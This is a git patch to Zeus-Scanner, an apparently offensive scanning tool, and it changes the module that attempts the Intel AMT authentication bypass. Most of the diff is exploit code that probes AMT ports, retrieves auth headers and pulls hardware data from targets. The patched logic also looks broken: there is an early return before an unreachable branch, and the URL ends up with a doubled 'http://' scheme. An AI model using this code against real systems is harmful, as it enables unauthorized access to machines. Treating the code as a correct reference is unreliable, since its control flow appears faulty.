From 46930fd19c7f707ee1d41483c2bc63fa9d4e4516 Mon Sep 17 00:00:00 2001 From: ekultek Date: Tue, 7 Nov 2017 12:22:53 -0600 Subject: [PATCH] patch for a reported issue (private) will now successfully search through the ports that may contain the AMT exploitable bypass --- etc/checksum/md5sum.md5 | 6 +- lib/attacks/intel_me/__init__.py | 125 ++++++++++++++----------------- lib/core/settings.py | 2 +- zeus.py | 2 +- 4 files changed, 62 insertions(+), 73 deletions(-) diff --git a/etc/checksum/md5sum.md5 b/etc/checksum/md5sum.md5 index cb096aa..89d3c2d 100644 --- a/etc/checksum/md5sum.md5 +++ b/etc/checksum/md5sum.md5 @@ -1,4 +1,4 @@ -8885c0c94d4e4adfdc9b5f66c508a7e2 ./zeus.py +913ce06f47d730817768c6d434bccad9 ./zeus.py 4b32db388e8acda35570c734d27c950c ./etc/scripts/launch_sqlmap.sh 6ad5f22ec4a6f8324bfb1b01ab6d51ec ./etc/scripts/cleanup.sh 155c9482f690f1482f324a7ffd8b8098 ./etc/scripts/fix_pie.sh @@ -48,10 +48,10 @@ d41d8cd98f00b204e9800998ecf8427e ./lib/attacks/whois_lookup/__init__.py 629f935edac35716cf0cb3548f0cc86c ./lib/attacks/xss_scan/__init__.py 27358f26bda30d7356143c3ea1fa99c5 ./lib/attacks/nmap_scan/__init__.py 216999fa0e84866d5c1d96d5676034e4 ./lib/attacks/nmap_scan/nmap_opts.py -be3bcc949bb54e19c5b349c78a575c8c ./lib/attacks/intel_me/__init__.py +a0b5265f235a266f7a48874c3d1e08f9 ./lib/attacks/intel_me/__init__.py 1faa2b5dfad6eb538bbfe42942d2a9da ./lib/core/errors.py d41d8cd98f00b204e9800998ecf8427e ./lib/core/__init__.py -5fcc4e1ddd394c1b4839025562fbc9d9 ./lib/core/settings.py +30112312eefcb5444d7916fb8f78142a ./lib/core/settings.py d41d8cd98f00b204e9800998ecf8427e ./var/google_search/__init__.py e9f1e2624154401840b0b118216ba82e ./var/google_search/search.py d41d8cd98f00b204e9800998ecf8427e ./var/__init__.py diff --git a/lib/attacks/intel_me/__init__.py b/lib/attacks/intel_me/__init__.py index a2dd20e..66d2bc9 100644 --- a/lib/attacks/intel_me/__init__.py +++ b/lib/attacks/intel_me/__init__.py @@ -14,7 +14,7 @@ from lxml import html from var.auto_issue.github import request_issue_creation -def __get_auth_headers(target, ports=(16992, 16693, 693, 692), **kwargs): +def __get_auth_headers(target, port, **kwargs): """ get the authorization headers from the URL """ @@ -24,20 +24,12 @@ def __get_auth_headers(target, ports=(16992, 16693, 693, 692), **kwargs): logger.info(set_color( "header value not established, attempting to get bypass..." )) - for port in ports: - try: - if verbose: - logger.debug(set_color( - "trying on port {}...".format(port), level=10 - )) - source = requests.get("http://{0}:{1}/index.htm".format(target, port), timeout=10, headers={ - 'connection': 'close', 'user-agent': agent - }, proxies=proxy) - return source - except Exception: - pass + source = requests.get("http://{0}:{1}/index.htm".format(target, port), timeout=10, headers={ + 'connection': 'close', 'user-agent': agent + }, proxies=proxy) + return source # Get digest and nonce and return the new header - if 'WWW-Authenticate' in source.headers: + elif 'WWW-Authenticate' in source.headers: logger.info(set_color( "header value established successfully, attempting authentication..." )) @@ -56,36 +48,27 @@ def __get_auth_headers(target, ports=(16992, 16693, 693, 692), **kwargs): return None -def __get_raw_data(target, page, agent=None, proxy=None, **kwargs): +def __get_raw_data(target, page, port, agent=None, proxy=None, **kwargs): """ collect all the information from an exploitable target """ - possible_ports = (16992, 16993, 693, 692) verbose = kwargs.get("verbose", False) logger.info(set_color( "attempting to get raw hardware information..." )) - for port in possible_ports: - try: - if verbose: - logger.debug(set_color( - "trying on port {}...".format(port), level=10 - )) - return requests.get("http://{0}:{1}/{2}.htm".format(target, port, page), - headers={ - 'connection': 'close', - 'Authorization': __get_auth_headers(target, verbose=verbose), - 'user-agent': agent - }, proxies=proxy) - except Exception: - pass + return requests.get("http://{0}:{1}/{2}.htm".format(target, port, page), + headers={ + 'connection': 'close', + 'Authorization': __get_auth_headers(target, port, verbose=verbose), + 'user-agent': agent + }, proxies=proxy) -def __get_hardware(target, agent=None, proxy=None, verbose=False): +def __get_hardware(target, port, agent=None, proxy=None, verbose=False): """ collect all the hardware information from an exploitable target """ - req = __get_raw_data(target, 'hw-sys', agent=agent, proxy=proxy, verbose=verbose) + req = __get_raw_data(target, 'hw-sys', port, agent=agent, proxy=proxy, verbose=verbose) if not req.status_code == 200: return None logger.info(set_color( @@ -131,6 +114,7 @@ def main_intel_amt(url, agent=None, proxy=None, **kwargs): verbose = kwargs.get("verbose", False) proxy = proxy_string_to_dict(proxy) or None agent = agent or DEFAULT_USER_AGENT + port_list = (16993, 16992, 693, 692) if do_ip_address: logger.warning(set_color( "running against IP addresses may result in the targets refusing the connection...", level=30 @@ -140,7 +124,7 @@ def main_intel_amt(url, agent=None, proxy=None, **kwargs): )) try: url = replace_http(url) - url = socket.gethostbyname(url) + url = "http://{}".format(socket.gethostbyname(url)) logger.info(set_color( "discovered IP address {}...".format(url) )) @@ -153,39 +137,44 @@ def main_intel_amt(url, agent=None, proxy=None, **kwargs): logger.info(set_color( "attempting to connect to '{}' and get hardware info...".format(url) )) - try: - json_data = __get_hardware(url, agent=agent, proxy=proxy, verbose=verbose) - if json_data is None: - logger.error(set_color( - "unable to get any information, skipping...", level=40 + for port in list(port_list): + if verbose: + logger.debug(set_color( + "trying on port {}...".format(port), level=10 )) - pass - else: - print("-" * 40) - for key in json_data.keys(): - print("{}:".format(str(key).capitalize())) - for item in json_data[key]: - print(" - {}: {}".format(item.capitalize(), json_data[key][item])) - print("-" * 40) - except requests.exceptions.ConnectionError as e: - if "Max retries exceeded with url" in str(e): - logger.error(set_color( - "failed connection, target machine is actively refusing the connection, skipping...", level=40 - )) - pass - else: - logger.error(set_color( - "failed connection with '{}', skipping...", level=40 - )) - pass - except Exception as e: - if "Temporary failure in name resolution" in str(e): - logger.error(set_color( - "failed to connect on '{}', skipping...".format(url), level=40 - )) - pass - else: - logger.exception(set_color( - "ran into exception '{}', cannot continue...".format(e), level=50 - )) - request_issue_creation() + try: + json_data = __get_hardware(url, port, agent=agent, proxy=proxy, verbose=verbose) + if json_data is None: + logger.error(set_color( + "unable to get any information, skipping...", level=40 + )) + pass + else: + print("-" * 40) + for key in json_data.keys(): + print("{}:".format(str(key).capitalize())) + for item in json_data[key]: + print(" - {}: {}".format(item.capitalize(), json_data[key][item])) + print("-" * 40) + except requests.exceptions.ConnectionError as e: + if "Max retries exceeded with url" in str(e): + logger.error(set_color( + "failed connection, target machine is actively refusing the connection, skipping...", level=40 + )) + pass + else: + logger.error(set_color( + "failed connection with '{}', skipping...", level=40 + )) + pass + except Exception as e: + if "Temporary failure in name resolution" in str(e): + logger.error(set_color( + "failed to connect on '{}', skipping...".format(url), level=40 + )) + pass + else: + logger.exception(set_color( + "ran into exception '{}', cannot continue...".format(e), level=50 + )) + request_issue_creation() diff --git a/lib/core/settings.py b/lib/core/settings.py index 5db0602..fa03297 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -44,7 +44,7 @@ PATCH_ID = str(subprocess.check_output(["git", "rev-parse", "origin/master"]))[: CLONE = "https://github.com/ekultek/zeus-scanner.git" # current version -VERSION = "1.1.20".format(PATCH_ID) +VERSION = "1.1.21.{}".format(PATCH_ID) # colors to output depending on the version VERSION_TYPE_COLORS = {"dev": 33, "stable": 92, "other": 30} diff --git a/zeus.py b/zeus.py index 81c340a..60eec60 100755 --- a/zeus.py +++ b/zeus.py @@ -324,7 +324,7 @@ if __name__ == "__main__": elif intel: url = get_true_url(url) return intel_me.main_intel_amt( - url, agent=agent_to_use, + url, agent=agent_to_use, verbose=opt.runInVerbose, proxy=proxy_to_use, do_ip=opt.runAgainstIpAddress ) elif admin: